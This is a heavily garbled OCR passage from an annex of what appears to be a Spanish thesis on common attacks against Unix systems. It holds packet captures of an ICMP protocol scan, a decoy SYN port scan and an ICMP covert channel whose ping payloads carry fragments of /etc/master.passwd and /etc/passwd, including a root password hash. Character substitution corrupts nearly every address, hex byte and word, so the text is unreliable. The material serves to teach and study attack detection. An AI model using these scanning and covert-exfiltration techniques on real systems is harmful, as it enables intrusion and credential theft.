De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 33 Paquete nro. 91 - Tiempo (7.(350(6 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9( - Tiempo ().03)37( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(( 93+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 3+ Paquete nro. 93 - Tiempo ().03)631 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9+ - Tiempo ().)+((91 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(3 935: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 35 Paquete nro. 95 - Tiempo ().)+(611 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 96 - Tiempo (9.6+63(9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(+ 9Dtp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dtp Paquete nro. 97 - Tiempo (9.6+6503 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9) - Tiempo 30.+5+7)9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(5 977p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 77p Paquete nro. 99 - Tiempo 30.+55+0+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 100 - Tiempo 31.(5)16) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(6 9i7prA!mtp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i7prA!mtp Paquete nro. 101 - Tiempo 31.(5)550 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 10( - Tiempo 3(.06(196 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(7 939: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 39

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J+ de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete nro. 103 - Tiempo 3(.06(5)5 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 10+ - Tiempo 3(.)66136 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D() 9+0: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 +0 Paquete nro. 105 - Tiempo 3(.)66570 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 106 - Tiempo 33.6701+( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 107 - Tiempo 3+.+7++75 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 10) - Tiempo 35.(7+56+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6 Paquete nro. 109 - Tiempo 36.0779+0 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(9 9ip@6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ip@6

B.2.*-. Ca"tura *5% ,K@ ,can con 5eco's
Paquete Nro: 1 - Tiempo: 0.000000 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.007(1( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.06957) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.075)30 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 Paquete Nro: 5 - Tiempo: 0.075)+( 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *JO de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.100* Te"" 19(.16).0.30 Paquete Nro: 6 - Tiempo: 0.0771+5 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: 7 - Tiempo: 0.077155 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:90:(a:(7: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.100 i at 00:0!:(9:90:(a:(7 Paquete Nro: ) - Tiempo: 0.07)565 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 9 - Tiempo: 0.07)579 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 10 - Tiempo: 0.0)0503 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: 11 - Tiempo: 0.0)05(0 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: 1( - Tiempo: 0.0)+0+7 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 13 - Tiempo: 0.0)++9) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.(0* Te"" 19(.16).0.30 Paquete Nro: 1+ - Tiempo: 0.0)+505 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: ff:ff:ff:ff:ff:ff 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.(0* Te"" 19(.16).0.30 Paquete Nro: 15 - Tiempo: 0.0)6(1) 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:)6:1(:a3: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.(0 i at 00:0!:(9:)6:1(:a3 Paquete Nro: 16 - Tiempo: 0.0)6(30 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 00:0!:(9:)6:1(:a3: -> 8P De tino: 00:0!:(9:e1:a(:(6: Proto!o"o: #$P De !rip!i%n: 19(.16).0.(0 i at 00:0!:(9:)6:1(:a3 Paquete Nro: 17 - Tiempo: 0.0)6++) 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(0:+()55

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J0 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 1) - Tiempo: 0.0)6+5+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 19 - Tiempo: 0.0)7509 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (0 - Tiempo: 0.0)7516 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (1 - Tiempo: 0.0)77(6 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: (( - Tiempo: 0.0))0+6 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (( > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (3 - Tiempo: 0.0))06) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: +()55 > (( -$.T0 .eq11 2en10 Paquete Nro: (+ - Tiempo: 0.0))1)+ 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (5 - Tiempo: 0.0))376 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (6 - Tiempo: 0.0))+50 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()55 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: (7 - Tiempo: 0.0))530 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: () - Tiempo: 0.0))716 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: (9 - Tiempo: 0.0))7(3 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:90:(a:(7 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.100:+()55 Proto!o"o: T,P

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+. de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 30 - Tiempo: 0.0)906( 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 31 - Tiempo: 0.0)9069 3a! Origen: 00:0!:(9:90:(a:(7 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 3( - Tiempo: 0.0)9395 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 33 - Tiempo: 0.0)9567 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 3+ - Tiempo: 0.0)9573 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:0!:(9:)6:1(:a3 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(0:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 35 - Tiempo: 0.0)9)76 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 36 - Tiempo: 0.0)9))3 3a! Origen: 00:0!:(9:)6:1(:a3 -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: 37 - Tiempo: 0.09006) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 3) - Tiempo: 0.090(7+ 3a! Origen: 00:0!:(9:e1:a(:(6 -> 3a! De tino: 00:17:31:96:5b:1f 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:+()55 Proto!o"o: T,P De !rip!i%n: (1 > +()55 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60 Paquete Nro: 39 - Tiempo: 0.090(9+ 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()55 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: +()55 > (1 -$.T0 .eq11 2en10 Paquete Nro: +0 - Tiempo: 1.(16)97 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.100:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: +1 - Tiempo: 1.(169(3 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(0:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+* de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: +( - Tiempo: 1.(1693) 3a! Origen: 00:17:31:96:5b:1f -> 3a! De tino: 00:0!:(9:e1:a(:(6 8P Origen: 19(.16).0.(:+()56 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: +()56 > )0 -./N0 .eq10 2en10 3..11+60

B.2.*1. Ca"tura *J% Covert C$annel 7CM!
Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame ( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 ,'e!6 um: 0D+)0+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 3) 00 6+ 73 61 35 (0 7( (+ a( 00 +) 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 00 (0 7+ (! 30 6b (+ 37 96 !0 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..t)..I......... ....?.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

Brame 3 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 ,'e!6 um: 0D17(1 -!orre!t0 87entifier: 0D1)1( .equen!e number: (56 90D0100: Data 91(0 bEte :

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *+2 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 30 (0 63 7( 7( 73 6e 17 9+ 0( 63 3a (6 61 3a 6e 65 3a 31 b) 0) 6b 30 3a 6! (a 65 7( 96 ba 00 6+ 3a (f (f 3a (7 3a 5b 00 17 6f 3a 7( 6( 30 61 (f 1f 00 (1 6f 30 6f 69 3a 67 7( 00 +0 1) 7( 3a 6f 6e 30 61 6f 0! 01 1( 76 30 7+ (f 3a 69 6f (9 +0 01 56 3a 3a 6( 3a 6e 7+ e1 3e 00 +) +3 (f 61 30 (0 3a a( !0 63 5+ 6) 75 73 3a 53 0a (6 a) 6! 61 61 73 6) 30 75 6+ 0) 00 61 6! 7( 7( 0a 3a 70 61 00 1e 76 +b 6! (f 7+ +( 65 65 +5 !0 65 30 69 6! 6f 6f 7( 67 00 a) 6( 3a 65 6f 6f 75 75 6f ..1.-...:..e..<. ......I.I>...... .....`....!"a@eb a!67oor@=?Ta"50: 0:0::0:0:,'ar"ie e:;root:;u r;"o !a";bin;ba '.too r:Q:0:0::0:0:Cou rne-again .uperu er:;root:.7aemo n:

mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M "e (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M mar!e"oI aturno:;me7ia;8nforma!ion;3i Do!umento ;KN2u;Te i ;$e!ur o Te i ;,aptura ;,ap6M !at (-,o@ert[ ,'anne"[ !on[ ?Ping[ -[ ,omp"eto.tDt Brame 1 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+00+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 0 90D0000: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 17 9+ 0( 63 3a (e 30 35 (3 30 +) 31 7b 0) 6b (0 70 30 36 0a 6! 96 )f 00 6+ 73 61 35 (0 7( (+ 5b 00 +0 6f 7( 73 (f 6( 6f 50 1f 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 0! 01 1( (3 65 6+ (f 6f 3a 6( (9 17 00 (0 7+ (! 30 6b (+ 37 e1 69 00 (+ 63 76 36 73 31 57 a( !0 63 +6 (f (0 (0 (0 (+ 6+ (6 a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 1e 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..1.-...:..e..<. ......I..i...... ....I.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?

